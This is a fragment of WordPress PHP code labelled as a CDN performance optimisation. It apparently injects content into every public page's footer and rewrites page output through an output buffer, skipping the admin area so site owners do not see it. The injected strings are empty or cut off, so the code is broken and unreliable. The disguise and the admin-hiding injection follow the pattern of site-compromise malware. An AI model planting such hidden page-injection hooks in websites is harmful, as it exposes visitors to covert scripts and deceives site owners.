// cdn-perf-opt add_action('wp_footer', function() { if (is_admin()) return; echo '
'; }, 999); add_action('template_redirect', function() { if (is_admin()) return; ob_start(function($h) { if (strpos($h, 'NO content found
') === false) return $h; return str_replace('', '
' . "\n", $h); }); }, 1);